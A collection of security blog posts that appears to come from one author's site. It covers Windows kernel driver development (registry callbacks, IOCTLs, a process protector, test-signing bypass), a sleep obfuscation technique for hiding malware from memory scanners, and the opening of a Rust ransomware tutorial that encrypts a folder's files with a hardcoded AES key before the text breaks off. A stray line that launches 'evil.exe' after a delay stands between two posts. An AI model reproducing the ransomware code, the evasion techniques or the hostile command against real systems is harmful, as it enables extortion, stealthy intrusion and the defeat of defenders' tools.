  [in]            PVOID            Object,
  [out, optional] PULONG_PTR       ObjectID,
  [out, optional] PCUNICODE_STRING *ObjectName,
  [in]            ULONG            Flags
);

Cookie is our global g_RegContext variable. Object is the registry key object. ObjectID is a unique registry identifier for our needs it can be null. *ObjectName is the output registry key path, make sure it is in the kernel format. Flags must be 0.

When you got the ObjectName it is just a matter of comparing it and the key that you want to protect and if it matches you can change the status to STATUS_ACCESS_DENIED to block the operation.

You can see a full implementation of the different registry operations handling in Nidhogg’s Registry Utils.

Conclusion

In this blog, we learned about the different types of kernel callbacks and created our registry protector driver.

In the next blog, we will learn two common hooking methods (IRP Hooking and SSDT Hooking) and two different injection techniques from the kernel to the user mode for both shellcode and DLL (APC and CreateThread) with code snippets and examples from Nidhogg.

I hope that you enjoyed the blog and I’m available on Twitter, Telegram and by Mail to hear what you think about it! This blog series is following my learning curve of kernel mode development and if you like this blog post you can check out Nidhogg on GitHub.

timeout /t 31 && start evil.exe

6 November 2022 at 00:00

star fork follow

Prologue

Cronos is a new sleep obfuscation technique co-authored by @idov31 and @yxel.

It is based on 5pider’s Ekko and like it, it encrypts the process image with RC4 encryption and evades memory scanners by also changing memory regions permissions from RWX to RW back and forth.

In this blog post, we will cover Cronos specifically and sleep obfuscation techniques in general and explain why we need them and the common ground of any sleep obfuscation technique.

As always, the full code is available on GitHub and for any questions feel free to reach out on Twitter.

Sleep Obfuscation In General

To understand why sleep obfuscations are a need, we need to understand what problem they attempt to solve. Detection capabilities evolves over the years, we can see that more and more companies going from using AV to EDRs as they provide more advanced detection capabilities and attempt to find the hardest attackers to find. Besides that, also investigators have better tools like pe-sieve that finds injected DLLs, hollowed processes and shellcodes and that is a major problem for any attacker that attempts to hide their malware.

To solve this issue, people came up with sleep obfuscation techniques and all of them have a basic idea: As long as the current piece of malware (whether it is DLL, EXE or shellcode) isn’t doing any important “work” (for example, when an agent don’t have any task from the C2 or backdoor that just checks in once in a while) it should be encrypted, when people start realizing that they came up with a technique that will encrypt the process image and decrypt it when it needs to be activated.

One of the very first techniques I got to know is Gargoyle which is an amazing technique for marking a process as non-executable and using the ROP chain to make it executable again. This worked great until scanners began to adapt and began looking also for non-executable memory regions, but in this game of cops and thieves, the attackers adapted again and started using a single byte XOR to encrypt the malicious part or the whole image an example for it is SleepyCrypt. SleepyCrypt not only adds encryption but also supports x64 binaries (the original Gargoyle supports only x86 but Waldo-IRC created an x64 version of Gargoyle) but, you guessed it, memory scanners found a solution to that as well by doing single XOR brute force on memory regions.

Now that we have the background and understand WHY sleep obfuscations exist let’s understand what has changed and what sleep obfuscation techniques we have nowadays.

Modern Sleep Obfuscations

Today (speaking in 2022) we have memory scanners that can brute force single-byte XOR encryption and detect malicious programs even when they do not have any executable rights, what can be done next?

The answer starts to become clearer in Foliage, which uses not only heavier obfuscation than single-byte XOR but also a neat trick to trigger the ROP chain to change the memory regions’ permission using NtContinue and context.

Later on, Ekko came out and added 2 important features: One of them is to RC4 encrypt the process image using an undocumented function SystemFunction032, and the other one is to address and fix the soft spot of every sleep technique so far: Stabilize the ROP using a small and very meaningful change to the RSP register.

To conclude the modern sleep obfuscation section we will also talk about DeathSleep a technique that kills the current thread after saving its CPU state and stack and then restores them. DeathSleep also helped a lot during the creation of Cronos.

Now, it is understandable where we are heading with this and combine all the knowledge we have accumulated so far to create Cronos.

Cronos

The main logic of Cronos is pretty simple:

  1. Changing the image’s protection to RW.

  2. Encrypt the image.

  3. Decrypt the image.

  4. Add execution privileges to the image.

To achieve this we need to do several things like encrypting somehow the image with a function, choosing which kind of timer to use and most importantly finding a way to execute code when the image is decrypted.

Finding an encryption function was easy, choosing SystemFunction032 was an obvious choice since it is well used (also in Ekko) and also documented by Benjamin Delpy in his article and many other places.

One may ask “Why to use a function that can be used as a strong IoC when you can do custom or XOR encryption?” the honest answer is that it will be much easier to use it in the ROP later on (spoiler alert) than implementing strong and good encryption.

Now, that we have an encryption function we need to have timers that can execute an APC function of our choosing. For that, I chose waitable timers because they are well-documented, easy and stable to use and easy to trigger - all that needs to be done is to call any alertable sleep function (e.g. SleepEx).

All we have left to do is to find a way to execute an APC that will trigger the sleeping function, the problem is that the code has to run regardless of the image’s state (whether has executable rights, encrypted, etc.) and the obvious solution is to use an ROP chain that will execute the sleep to trigger the APC.

For the final stage, we used the NtContinue trick from Foliage to execute the different stages of sleep obfuscation (RW -> Encrypt -> Decrypt -> RWX).

Conclusion

This was a fun project to make, and we were able to make it thanks to the amazing projects mentioned here every single one of them created another piece to get us where we are here.

I hope that you enjoyed the blog and would love to hear what you think about it!

Lord Of The Ring0 - Part 3 | Sailing to the land of the user (and debugging the ship)

30 October 2022 at 00:00

star fork follow

Prologue

In the last blog post, we understood what it is a callback routine, how to get basic information from user mode and for the finale created a driver that can block access to a certain process. In this blog, we will dive into two of the most important things there are when it comes to driver development: How to debug correctly, how to create good user-mode communication and what lessons I learned during the development of Nidhogg so far.

This time, there will be no hands-on code writing but something more important - how to solve and understand the problems that pop up when you develop kernel drivers.

Debugging

The way I see it, there are 3 approaches when it comes to debugging a kernel: The good, the great and the hacky (of course you can combine them all and any of them). I’ll start by explaining every one of them, the benefits and the downsides.

  • The good: This method is for anyone because it doesn’t require many resources and is very effective. All you need to do is to set the VM where you test your driver to produce a crash dump (you can leave the crash dump option to automatic) and make sure that in the settings the disable automatic deletion of memory dumps when the disk is low is checked or you can find yourself very confused to not find the crash dump when it should be generated. Then, all you have to do is to drag the crash dump back to your computer and analyze it. The con of this method is that sometimes you can see corrupted data and values that you don’t know how they got there, but most of the time you will get a lot of information that can be very helpful to trace back the source of the problem.

  • The great: This method is for those who have a good computer setup because not everyone can run it smoothly, to debug your VM I recommend following these instructions. Then, all you have to do is put breakpoints in the right spots and do the debugging we all love to hate but gives the best results as you can track everything and see everything in real-time. The con of this method is that it requires a lot of resources from the computer and not everyone (me included) has enough resources to open Visual Studio, run a VM and remote debug it with WinDBG.

  • The hacky: I highly recommend not using this method alone. Like in every type of program you can print debugging messages with KdPrint and set up the VM to enable debugging messages and fire up DbgView to see your messages. Make sure that if you are printing a string value lower the IRQL like so:

KIRQL prevIrql = KeGetCurrentIrql();
KeLowerIrql(PASSIVE_LEVEL);
KdPrint(("Print your string %ws.\n", myString));
KeRaiseIrql(prevIrql, &prevIrql);

Because it lets you see what the values of the current variables are it is very useful, just not if you did something that causes the machine to crash, that’s why I recommend combining it with either the crash dump option or the debugging option.

I won’t do here a guide on how to use WinDBG because there are many great guides out there but I will add a word about it. The top commands that help me a lot during the process of understanding what’s wrong are:

  • !analyze -v: It lets WinDBG load the symbols, what is the error code and most importantly the line in your source code that led to that BSOD.

  • lm: This command shows you all the loaded modules at the time of the crash and allows you to iterate them, their functions, etc.

  • uf /D <address>: This command shows you the disassembly of a specific address, so you can examine it.

After we now know the basics of how to debug a driver, let’s dive into the main event: how to properly exchange data with the user mode.

Talking with the user-mode 102

Last time we understood the different methods to send and get data from user mode, the basic usage of IOCTLs and what IRPs are. But what happens when we want to send a list of different variables? What happens if we want to send a file name, process name or something that isn’t just a number?

DISCLAIMER: As I said before, in this series I’ll be using the IOCTL method, so we will address the problem using this method.

To properly send data we can use the handly and trusty struct. What you need to do is to define a data structure in both your user application and the kernel application for what you are planning to send, for example:

struct MyItem {
    int type;
    int price;
    WCHAR* ItemsName;
}

And send it through the DeviceIoControl:

DeviceIoControl(hFile, IOCTL_DEMO,
        &myItem, sizeof(myItem),
        &myItem, sizeof(myItem), &returned, nullptr)

But all of this we knew before, so what is new? As you noticed, I sent myItem twice and the reason is in the definition of DeviceIoControl:

BOOL DeviceIoControl(
  [in]                HANDLE       hDevice,
  [in]                DWORD        dwIoControlCode,
  [in, optional]      LPVOID       lpInBuffer,
  [in]                DWORD        nInBufferSize,
  [out, optional]     LPVOID       lpOutBuffer,
  [in]                DWORD        nOutBufferSize,
  [out, optional]     LPDWORD      lpBytesReturned,
  [in, out, optional] LPOVERLAPPED lpOverlapped
);

We can define the IOCTL in a way that will allow the driver to both receive data and send data, all we have to do is to define our IOCTL with the method type METHOD_BUFFERED like so:

#define IOCTL_DEMO CTL_CODE(0x8000, 0x800, METHOD_BUFFERED, FILE_ANY_ACCESS)

And now, SystemBuffer is accessible for both writing and reading.

A quick reminder: SystemBuffer is the way we can access the user data, and is accessible to us through the IRP like so:

Irp->AssociatedIrp.SystemBuffer;

Now that we can access it there several questions remain: How can I write data to it without causing BSOD? And how can I verify that I get the type that I want? What if I want to send or receive a list of items and not just one?

The second question is easy to answer and is already shown up in the previous blog post:

auto size = stack->Parameters.DeviceIoControl.InputBufferLength;

if (size % sizeof(MyItem) != 0) {
    status = STATUS_INVALID_BUFFER_SIZE;
    break;
}

This is a simple yet effective test but isn’t enough, that is why we also need to verify every value we want to use:

...
auto data = (MyItem*)Irp->AssociatedIrp.SystemBuffer;

if (data->type < 0 || !data->ItemsName || data->price < 0) {
    status = STATUS_INVALID_PARAMETER;
    break;
}
...

This is just an example of checks that need to be done when accessing user mode data, and everything that comes or returns to the user should be taken care of with extreme caution.

Writing data back to the user is fairly easy like in user mode, the hard part comes when you want to return a list of items but don’t want to create an entirely new structure just for it. Microsoft themselves solved this in a pretty strange-looking yet effective way, you can see it in several WinAPIs for example when iterating a process or modules and there are two approaches:

The first one will be sending each item separately and when the list ends send null. The second method is sending first the number of items you are going to send and then sending them one by one. I prefer the second method (and you can also see it implemented in Nidhogg) but you can do whatever works for you.

Conclusion

This time, it was a relatively short blog post but very important for anyone that wants to write a kernel mode driver correctly and learn to solve their problems.

In this blog, we learned how to debug a kernel driver and how to properly exchange data between our kernel driver to the user mode. In the next blog, we will understand the power of callbacks and learn about the different types that are available to us.

I hope that you enjoyed the blog and I’m available on Twitter, Telegram and by Mail to hear what you think about it! This blog series is following my learning curve of kernel mode development and if you like this blog post you can check out Nidhogg on GitHub.

Lord Of The Ring0 - Part 2 | A tale of routines, IOCTLs and IRPs

4 August 2022 at 00:00

star fork follow

Prologue

In the last blog post, we had an introduction to kernel development and what are the difficulties when trying to load a driver and how to bypass it. In this blog, I will write more about callbacks, how to start writing a rootkit and the difficulties I encountered during my development of Nidhogg.

As I promised to bring both defensive and offensive points of view, we will create a driver that can be used for both blue and red teams - A process protector driver.

P.S: The name Nidhogg was chosen after the nordic dragon that lies underneath Yggdrasil :).

Talking with the user mode 101

A driver should be (most of the time) controllable from the user mode by some process, an example would be Sysmon - When you change the configuration, turn it off or on it tells its kernel part to stop performing certain operations, works by an updated policy or just shut down it when you decide to unload Sysmon. As kernel drivers, we have two ways to communicate with the user mode: Via DIRECT_IO or IOCTLs.The advantage of DIRECT_IO is that it is more simple to use and you have more control and the advantage of using IOCTLs is that it is safer and developer friendly. In this blog series, we will use the IOCTLs approach.

To understand what is an IOCTL better, let’s look at an IOCTL structure:

#define MY_IOCTL CTL_CODE(DeviceType, FunctionNumber, Method, Access)

The device type indicates what is the type of the device (different types of hardware and software drivers), it doesn’t matter much for software drivers will be the number but the convention is to use 0x8000 for 3rd software drivers like ours.

The second parameter indicates the function “index” in our driver, it could be any number but the convention suggests starting from 0x800.

The method parameter indicates how the input and output should be handled by the driver, it could be either METHOD_BUFFERED or METHOD_IN_DIRECT or METHOD_OUT_DIRECT or METHOD_NEITHER.

The last parameter indicates if the driver accepts the operation (FILE_WRITE_ACCESS) or the driver operates (FILE_READ_ACCESS) or the driver accepts and performs the operation (FILE_ANY_ACCESS).

To use IOCTLs, on the driver’s initialization you will need to set a function that will parse an IRP and knows how to handle the IOCTLs, such a function is defined as followed:

NTSTATUS MyDeviceControl(
    [in] PDEVICE_OBJECT DeviceObject, 
    [in] PIRP           Irp
);

IRP in a nutshell is a structure that represents an I/O request packet. You can read more about it in MSDN.

When communicating with the user mode we need to define two more things: The device object and the symbolic link. The device object is the object that handles the I/O requests and allows us as a user-mode program to communicate with the kernel driver. The symbolic link creates a linkage in the GLOBAL?? directory so the DeviceObject will be accessible from the user mode and usually looks like \??\DriverName.

Callback Routines

To understand how to use callback routines let’s understand WHAT are they. The callback routine is a feature that allows kernel drivers to register for certain events, an example would be process operation (such as: getting a handle to process) and affect their result. When a kernel driver registers for an operation, it notifies “I’m interested in the certain event and would like to be notified whenever this event occurs” and then for each time this event occurs the driver is get notified and a function is executed.

One of the most notable ways to register for an operation is with the ObRegisterCallbacks function:

NTSTATUS ObRegisterCallbacks(
  [in]  POB_CALLBACK_REGISTRATION CallbackRegistration,
  [out] PVOID                     *RegistrationHandle
);

typedef struct _OB_CALLBACK_REGISTRATION {
  USHORT                    Version;
  USHORT                    OperationRegistrationCount;
  UNICODE_STRING            Altitude;
  PVOID                     RegistrationContext;
  OB_OPERATION_REGISTRATION *OperationRegistration;
} OB_CALLBACK_REGISTRATION, *POB_CALLBACK_REGISTRATION;

typedef struct _OB_OPERATION_REGISTRATION {
  POBJECT_TYPE                *ObjectType;
  OB_OPERATION                Operations;
  POB_PRE_OPERATION_CALLBACK  PreOperation;
  POB_POST_OPERATION_CALLBACK PostOperation;
} OB_OPERATION_REGISTRATION, *POB_OPERATION_REGISTRATION;

Using this callback we can register for two types of OperationRegistration: ObjectPreCallback and ObjectPostCallback. The pre-callback happens before the operation is executed and the post-operation happens after the operation is executed and before the user gets back the output.

Using ObRegisterCallback you can register for this ObjectTypes of operations (You can see the full list defined in WDM.h):

  • PsProcessType
  • PsThreadType
  • ExDesktopObjectType
  • IoFileObjectType
  • CmKeyObjectType
  • ExEventObjectType
  • SeTokenObjectType

To use this function, you will need to create a function with a unique signature as follows (depending on your needs and if you are using PreOperation or PostOperation):

OB_PREOP_CALLBACK_STATUS PobPreOperationCallback(
  [in] PVOID RegistrationContext,
  [in] POB_PRE_OPERATION_INFORMATION OperationInformation
)

void PobPostOperationCallback(
  [in] PVOID RegistrationContext,
  [in] POB_POST_OPERATION_INFORMATION OperationInformation
)

Now that we understand better what callbacks are we can write our first driver - A kernel driver that protects a process.

Let’s build - Process Protector

To build a process protector we need to first understand how will it work. What we want is basic protection against any process that attempts to kill our process, the protected process could be our malicious program or our precious Sysmon agent. To perform the killing of a process the process that performs the killing will need a handle with the PROCESS_TERMINATE permissions, and before we said that we could register for certain events like a request for the handle to process. So as a driver, you could remove permissions from a handle and return a handle without specific permission which is in our case the PROCESS_TERMINATE permission.

To start with the development we will need a DriverEntry function:

#include <ntddk.h>

// Definitions
#define IOCTL_PROTECT_PID    CTL_CODE(0x8000, 0x800, METHOD_BUFFERED, FILE_ANY_ACCESS)
#define PROCESS_TERMINATE 1

// Prototypes
DRIVER_UNLOAD ProtectorUnload;
DRIVER_DISPATCH ProtectorCreateClose, ProtectorDeviceControl;

OB_PREOP_CALLBACK_STATUS PreOpenProcessOperation(PVOID RegistrationContext, POB_PRE_OPERATION_INFORMATION Info);

// Globals
PVOID regHandle;
ULONG protectedPid;

NTSTATUS DriverEntry(PDRIVER_OBJECT DriverObject, PUNICODE_STRING) {
    NTSTATUS status = STATUS_SUCCESS;
    UNICODE_STRING deviceName = RTL_CONSTANT_STRING(L"\\Device\\Protector");
    UNICODE_STRING symName = RTL_CONSTANT_STRING(L"\\??\\Protector");
    PDEVICE_OBJECT DeviceObject = nullptr;

    OB_OPERATION_REGISTRATION operations[] = {
        {
            PsProcessType,
            OB_OPERATION_HANDLE_CREATE | OB_OPERATION_HANDLE_DUPLICATE,
            PreOpenProcessOperation, nullptr
        }
    };

    OB_CALLBACK_REGISTRATION reg = {
        OB_FLT_REGISTRATION_VERSION,
        1,
        RTL_CONSTANT_STRING(L"12345.6879"),
        nullptr,
        operations
    };

    ...

Before we continue let’s explain what’s going on, we defined a deviceName with our driver name (Protector) and a symbolic link with the same name (the symName parameter). We also defined an array of operations that we want to register for - In our case it is just the PsProcessType for each handle creation or handle duplication.

We used this array to finish the registration definition - the number 1 stands for only 1 operation to be registered, and the 12345.6879 defines the altitude. An altitude is a unique double number (but using a UNICODE_STRING to represent it) that is used to identify registration and relate it to a certain driver.

As you probably noticed, the DriverEntry is “missing” the RegistryPath parameter, to not write UNREFERENCED_PARAMETER(RegistryPath) we can just not write it and it will be unreferenced.

Now, let’s do the actual registration and finish the DriverEntry function:

...

    status = IoCreateDevice(DriverObject, 0, &deviceName, FILE_DEVICE_UNKNOWN, 0, FALSE, &DeviceObject);

    if (!NT_SUCCESS(status)) {
        KdPrint((DRIVER_PREFIX "failed to create device object (status=%08X)\n", status));
        return status;
    }

    status = IoCreateSymbolicLink(&symName, &deviceName);

    if (!NT_SUCCESS(status)) {
        KdPrint((DRIVER_PREFIX "failed to create symbolic link (status=%08X)\n", status));
        IoDeleteDevice(DeviceObject);
        return status;
    }

    status = ObRegisterCallbacks(&reg, &regHandle);

    if (!NT_SUCCESS(status)) {
        KdPrint((DRIVER_PREFIX "failed to register the callback (status=%08X)\n", status));
        IoDeleteSymbolicLink(&symName);
        IoDeleteDevice(DeviceObject);
        return status;
    }

    DriverObject->DriverUnload = ProtectorUnload;
    DriverObject->MajorFunction[IRP_MJ_CREATE] = DriverObject->MajorFunction[IRP_MJ_CLOSE] = ProtectorCreateClose;
    DriverObject->MajorFunction[IRP_MJ_DEVICE_CONTROL] = ProtectorDeviceControl;

    KdPrint(("DriverEntry completed successfully\n"));
    return status;
}

Using the functions IoCreateDevice and IoCreateSymbolicLink we created a device object and a symbolic link. After we know our driver can be reached from the user mode we registered our callback with ObRegisterCallbacks and defined important major functions such as ProtectorCreateClose (will explain it soon) and ProtectorDeviceControl to handle the IOCTL.

The ProtectorUnload function is very simple and just does the cleanup like we did if the status wasn’t successful: The next thing on the list is to implement the ProtectorCreateClose function. The function is responsible on complete the IRP, since in this driver we don’t have multiple device objects and we are not doing much with it we can handle the completion of the relevant IRP in our DeviceControl function and for any other IRP just close it always with a successful status.

NTSTATUS ProtectorCreateClose(PDEVICE_OBJECT, PIRP Irp) {
    Irp->IoStatus.Status = STATUS_SUCCESS;
    Irp->IoStatus.Information = 0;
    IoCompleteRequest(Irp, IO_NO_INCREMENT);
    return STATUS_SUCCESS;
}

The device control is also fairly simple as we have only one IOCTL to handle:

NTSTATUS ProtectorDeviceControl(PDEVICE_OBJECT, PIRP Irp) {
    NTSTATUS status = STATUS_SUCCESS;
    auto stack = IoGetCurrentIrpStackLocation(Irp);

    switch (stack->Parameters.DeviceIoControl.IoControlCode) {
        case IOCTL_PROTECT_PID:
        {
            auto size = stack->Parameters.DeviceIoControl.InputBufferLength;

            if (size % sizeof(ULONG) != 0) {
                status = STATUS_INVALID_BUFFER_SIZE;
                break;
            }

            auto data = (ULONG*)Irp->AssociatedIrp.SystemBuffer;
            protectedPid = *data;
            break;
        }
        default:
            status = STATUS_INVALID_DEVICE_REQUEST;
            break;
    }

    Irp->IoStatus.Status = status;
    Irp->IoStatus.Information = 0;
    IoCompleteRequest(Irp, IO_NO_INCREMENT);
    return status;
}

As you noticed, to see the IOCTL, get the input and for more operations in the future, we need to use the IRP’s stack. I won’t go over its entire structure but you can view it in MSDN. To make it clearer, when using the METHOD_BUFFERED option the input and output buffers are delivered via the SystemBuffer that is located within the IRP’s stack.

After we got the stack and verified the IOCTL, we need to check our input because wrong input handling can cause a BSOD. When the input verification is completed all we have to do is just change the protectedPid to the wanted PID.

With the DeviceControl and the CreateClose functions, we can create the last function in the kernel driver - The PreOpenProcessOperation.

OB_PREOP_CALLBACK_STATUS PreOpenProcessOperation(PVOID, POB_PRE_OPERATION_INFORMATION Info) {
    if (Info->KernelHandle)
        return OB_PREOP_SUCCESS;
    
    auto process = (PEPROCESS)Info->Object;
    auto pid = HandleToULong(PsGetProcessId(process));
    
    // Protecting our pid and removing PROCESS_TERMINATE.
    if (pid == protectedPid) {
        Info->Parameters->CreateHandleInformation.DesiredAccess &= ~PROCESS_TERMINATE;
    }
    
    return OB_PREOP_SUCCESS;
}

Very simple isn’t it? Just logic and the opposite value of the PROCESS_TERMINATE and we are done.

Now, we have left only one thing to make sure and it is to allow our driver to register for operation registration, it can be done within the project settings in Visual Studio in the linker command line and just add /integritycheck switch.

After we finished with the kernel driver part let’s go to the user-mode part.

Protector’s User mode Part

The user-mode part is even simple as we just need to create a handle for the device object and send the wanted PID.

#include <iostream>
#include <Windows.h>

int main(int argc, const char* argv[]) {
    DWORD bytes;

    if (argc != 1) {
        std::cout << "Usage: " << argv[0] << " <pid>" << std::endl;
        return 1;
    }

    DWORD pid = atoi(argv[1]);
    HANDLE device = CreateFile(L"\\\\.\\Protector", GENERIC_READ | GENERIC_WRITE, 0, nullptr, OPEN_EXISTING, 0, nullptr);

    if (device == INVALID_HANDLE_VALUE) {
        std::cout << "Failed to open device" << std::endl;
        return 1;
    }

    success = DeviceIoControl(device, IOCTL_PROTECT_PID, &pid, sizeof(pid), nullptr, 0, &bytes, nullptr);
    CloseHandle(device);

    if (!success) {
        std::cout << "Failed in DeviceIoControl: " << GetLastError() << std::endl;
        return 1;
    }
    
    std::cout << "Protected process with pid: " << pid << std::endl;
    return 0;
}

Congratulations on writing your very first functional kernel driver!

Bonus - Anti-dumping

To prevent a process from being dumped all we have to do is just remove more permissions such as PROCESS_VM_READ, PROCESS_DUP_HANDLE and PROCESS_VM_OPERATION. An example can be found in Nidhogg’s ProcessUtils file.

Conclusion

In this blog, we got a better understanding of how to write a driver, how to communicate it and how to use callbacks. In the next blog, we will dive more into this world and learn more new things about kernel development.

I hope that you enjoyed the blog and I’m available on Twitter, Telegram and by Mail to hear what you think about it! This blog series is following my learning curve of kernel mode development and if you like this blog post you can check out Nidhogg on GitHub.

Lord Of The Ring0 - Part 1 | Introduction

14 July 2022 at 00:00

star fork follow

Introduction

This blog post series isn’t a thing I normally do, this will be more like a journey that I document during the development of my project Nidhogg. In this series of blogs (which I don’t know how long will it be), I’ll write about difficulties I encountered while developing Nidhogg and tips & tricks for everyone who wants to start creating a stable kernel mode driver in 2022.

This series will be about WDM type of kernel drivers, developed in VS2019. To install it, you can follow the guide in MSDN. I highly recommend that you test EVERYTHING in a virtual machine to avoid crashing your computer.

Without further delays - Let’s start!

Kernel Drivers In 2022

The first question you might ask yourself is: How can kernel driver help me in 2022? There are a lot of 1337 things that I can do for the user mode without the pain of developing and consistently crashing my computer.

From a red team perspective, I think that there are several things that a kernel driver can give that user mode can’t.

  • Being an efficient backdoor with extremely evasive persistency.
  • Do highly privileged operations without the dependency of LPE exploit or privileged users.
  • Easily evade AV / EDR hooks.
  • Be able to hide your implant without suspicious user-mode hooks.

From a blue team perspective, you can log more events and block suspicious operations with methods you won’t be able to do in the user mode.

  • Create a driver to monitor and log specific events (like Sysmon) specially crafted to meet your organization’s needs.
  • Create kernel mode hooks to find advanced rootkits and malware.
  • Provide kernel mode protection to your blue agents (such as OSQuery, Wazuh, etc.).

NOTE: This blog series will focus more on the red team part but I’ll also add the blue team perspective as one affects the other.

Basic driver structure

Like any good programmer, we will start with creating a basic driver to print famous words with an explanation of the basics.

#include <ntddk.h>

extern "C"
NTSTATUS DriverEntry(PDRIVER_OBJECT DriverObject, PUNICODE_STRING RegistryPath) {
    UNREFERENCED_PARAMETER(RegistryPath);
    DriverObject->DriverUnload = MyUnload;
    KdPrint(("Hello World!\n"));
    return STATUS_SUCCESS;
}

void MyUnload(PDRIVER_OBJECT DriverObject) {
    UNREFERENCED_PARAMETER(DriverObject);
    KdPrint(("Goodbye World!\n"));
}

This simple driver will print “Hello World!” and “Goodbye World!” when it’s loaded and unloaded. Since the parameter RegistryPath is not used, we can use UNREFERENCED_PARAMETER to optimize the variable.

Every driver needs to implement at least two of the functions mentioned above.

The DriverEntry is the first function that is called when the driver is loaded and it is very much like the main function for user-mode programs, except it gets two parameters:

  • DriverObject: A pointer to the driver object.
  • RegistryPath: A pointer to a UNICODE_STRING structure that contains the path to the driver’s registry key.

The DriverObject is an important object that will serve us a lot in the future, its definition is:

typedef struct _DRIVER_OBJECT {
  CSHORT             Type;
  CSHORT             Size;
  PDEVICE_OBJECT     DeviceObject;
  ULONG              Flags;
  PVOID              DriverStart;
  ULONG              DriverSize;
  PVOID              DriverSection;
  PDRIVER_EXTENSION  DriverExtension;
  UNICODE_STRING     DriverName;
  PUNICODE_STRING    HardwareDatabase;
  PFAST_IO_DISPATCH  FastIoDispatch;
  PDRIVER_INITIALIZE DriverInit;
  PDRIVER_STARTIO    DriverStartIo;
  PDRIVER_UNLOAD     DriverUnload;
  PDRIVER_DISPATCH   MajorFunction[IRP_MJ_MAXIMUM_FUNCTION + 1];
} DRIVER_OBJECT, *PDRIVER_OBJECT;

But I’d like to focus on the MajorFunction: This is an array of important functions that the driver can implement for IO management in different ways (direct or with IOCTLs), handling IRPs and more.

We will use it for the next part of the series but for now, keep it in mind. (A little tip: Whenever you encounter a driver and you want to know what it is doing make sure to check out the functions inside the MajorFunction array).

To finish the most basic initialization you will need to do one more thing - define the DriverUnload function. This function will be responsible to stop callbacks and free any memory that was allocated.

When you finish your driver initialization you need to return an NT_STATUS code, this code will be used to determine if the driver will be loaded or not.

Testing a driver

If you tried to copy & paste and run the code above, you might have noticed that it’s not working.

By default, Windows does not allow loading self-signed drivers, and surely not unsigned drivers, this was created to make sure that a user won’t load a malicious driver and by that give an attacker even more persistence and privileges on the attacked machine.

Luckily, there is a way to bypass this restriction for testing purposes, to do this run the following command from an elevated cmd:

bcdedit /set testsigning on

After that restart, your computer and you should be able to load the driver.

To test it out, you can use Dbgview to see the output (don’t forget to compile to debug to see the KdPrint’s output). To load the driver, you can use the following command:

sc create DriverName type= kernel binPath= C:\Path\To\Driver.sys
sc start DriverName 

And to unload it:

sc stop DriverName

You might ask yourself now, how an attacker can deploy a driver? This can be done in several ways:

  • The attacker has found/generated a certificate (the expiration date doesn’t matter).
  • The attacker has allowed test signing (just like we did now).
  • The attacker has a vulnerable driver with 1-day that allows loading drivers.
  • The attacker has a zero-day that allows load drivers.

Just not so long ago when Nvidia was breached a signature was leaked and used by threat actors.

Resources

When we will continue to dive into the series, I will use a lot of references from the following amazing resources:

  • Windows Kernel Programming.
  • Windows Internals Part 7.
  • MSDN (I know I said amazing, I lied here).

And you can check out the following repositories for drivers examples:

Conclusion

This blog post may be short but is the start of the coming series of blog posts about kernel drivers and rootkits specifically. Another one, more detailed, will come out soon!

I hope that you enjoyed the blog and I’m available on Twitter, Telegram and by Mail to hear what you think about it! This blog series is following my learning curve of kernel mode development and if you like this blog post you can check out Nidhogg on GitHub.

Rust 101 - Let’s write Rustomware

star fork follow

Introduction

When I first heard about Rust, my first reaction was “Why?”. The language looked to me as a “wannabe” to C and I didn’t understand why it is so popular. I started to read more and more about this language and began to like it. To challenge myself, I decided to write rustomware in Rust. Later on, I ran into trickster0’s amazing repository OffensiveRust and that gave me more motivation to learn Rust. Nowadays I’m creating a unique C2 framework written (mostly) in Rust. If you are familiar with Rust, you can skip to Part 2 below.

The whole code for this blog post is available on my GitHub :).

Rust’s capabilities

The reason that I think that Rust is an awesome language is that it’s a powerful compiler, has memory safety, easy syntax and great interaction with the OS. Rust’s compiler takes care to alert for anything that can be problematic - A thing that can be annoying but in the end, it helps the developer to create safer programs. On the other hand, the compiler also takes care of annoying tasks that are required when programming in C like freeing memory, closing files, etc. Rust is also a cross-platform language, so it can be used on any platform and be executed differently depending on the OS.

Part 1 - Hello Rust

Enough talking and let’s start to code! The first thing we want to do is create our program, it can be done with this simple command:

cargo new rustomware
cd rustomware

In the rustsomware directory, we will have these files:

rustomware
│   .gitignore
│   Cargo.toml    
│
└───src
│   │   main.rs
│   
└───.git
    │   ...

In the main.rs file, we will write our code, and in Cargo.toml we will include our modules. To build our new program, we will use the following command:

cargo build

Our executable will be in the target directory (because we didn’t use the release flag so it will be in debugging) and will be called rustomware.exe. You’ll notice that there are a few new files and directories - the Cargo.lock file, and many files under the target directory. I won’t elaborate on them here but in general the Cargo.lock file contains the dependencies of the project in a format that can be used by Cargo to build the project. THERE IS NO NEED TO EDIT THOSE FILES. In the target directory, we will have the modules themselves, the executable and the PDB file. After we learned a bit about Rust, we can dive into coding our ransomware.

Part 2 - Iterating the target folder

Like any good ransomware, we will need to have these functionalities:

  • Encrypting files.
  • Decrypting files.
  • Dropping a README file.
  • Adding our extension to the files.

For that, we will need to use crates (modules) to help us out. First things first, we need to be able to get a list of all the files in the target directory from the argv. To do that, we can use the std library and the fs module. To use a module all we need to do is to import it:

use std::{
    env,
    fs
};

fn main() {
    let args: Vec<_> = env::args().collect();
    
    if args.len() < 2 {
        println!("Not enough arguments! Usage: rustsomware <encrypt|decrypt> <folder>");
        return;
    }

    let entries = fs::read_dir(args[2].clone()).unwrap();

    for raw_entry in entries {
        let entry = raw_entry.unwrap();

        if entry.file_type().unwrap().is_file() {
            println!("File Name: {}", entry.path().display())
        }
    }
}

Now we have a program that finds files in a folder. Notice that we used the unwrap() method to get the result, it is required because Rust functions mostly send as a result type that can be either Ok or Err. We also needed to clone the string because Rust needs to clone objects or create a safe borrow (It is not recommended to borrow objects, but it is possible and can be useful in some cases).

Part 3 - Encrypting / Decrypting the files

To encrypt the files, we will the AES cipher with a hardcoded key and IV. All that is left for us to do is to create a function that is responsible to encrypt the file and change its extension to .rustsomware. First things first, to be able to do encryption/decryption methods we will need to have a crate to help with that. Since the libaes crate isn’t a default crate, we need to import it to our project and this can be done by modifying the Cargo.toml file by adding:

[Dependencies]

libaes = "0.6.2"

Now, we can create a function that can encrypt and decrypt. For the sake of practice, we will use a hardcoded key and IV but this is NOT recommended at all.

fn encrypt_decrypt(file_name: &str, action: &str) -> bool {
    let key = b"fTjWmZq4t7w!z%C*";
    let iv = b"+MbQeThWmZq4t6w9";
    let cipher = Cipher::new_128(key);

    match action {
        "encrypt" => {
            println!("[*] Encrypting {}", file_name);
            let encrypted = cipher.cbc_encrypt(iv, &fs::read(file_name).unwrap());
            fs::write(file_name, encrypted).unwrap();
